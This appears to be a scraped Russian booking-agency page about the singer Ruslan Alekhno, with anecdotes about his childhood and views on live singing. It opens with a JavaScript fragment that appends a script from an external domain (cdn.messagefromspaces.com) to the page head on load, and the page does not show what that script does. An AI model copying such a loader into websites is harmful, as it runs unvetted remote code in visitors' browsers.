, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Оставить вопрос
Ваше имя:
Ваш телефон:
Вопрос или сообщение:

Руслан Алехно

По вопросам выступлений звоните - 8(831) 2187821 | ZVEZDA-BEZ-NACENKI.RU

Руслан Алехно – популярный белорусско-русский певец, известный яркой победой в телевизионном конкурсе «Народный Артист 2» и песнями «Женщина любимая моя», евровидийной «Hasta la Vista», «Бегущая по волнам», «Облако», «Мроя».

В детстве он терпеть не мог делать уроки, прогуливал занятия в общей и музыкальной школе, и, чтобы отец не ругался, расписывался у себя в дневнике за преподавателей. В основном «тройками» и «четверками», потому что «пятерки» могли бы вызвать подозрение.

 

«…Мы с братом, придем на занятие, а дверь закрыта. Учитель, например, просто отошел ненадолго. Мы с братом его и не ждали, убегали на улицу. Такое веселое детство.

Когда мы с родителями жили в общежитии (мне было тогда 5-6 лет, родители мне принесли ударную установку. Я включал магнитофон и с утра до вечера бил в барабаны. Я не то, чтобы играл, а усердно барабанил. Соседи вешались, постоянно стучали в комнату и высказывали претензии. Столько семей там жило, и только теперь понимаю, что это для них было. Терпенье и труд все перетрут. Руслан трудился, соседи терпели…»

 

«Я мечтал о том, чтобы когда-нибудь настало время, когда со мной будут работать хореографы, педагоги по вокалу. При любой работе необходимо, чтобы за тобой со стороны наблюдал специалист, корректировал твои действия. Я хотел быть в этой профессии до максимума, серьезно и по-честному. В частности, буду петь вживую. На западе все поют вживую. Это неправильно, когда артист выходит на сцену и работает под фонограмму. Я себя чувствую некомфортно. Другое настроение. Оно не идет ни в какое сравнение с творением процесса».

Звоните, мы проконсультируем Вас по Вашим вопросам:

8 (831) 21-878-21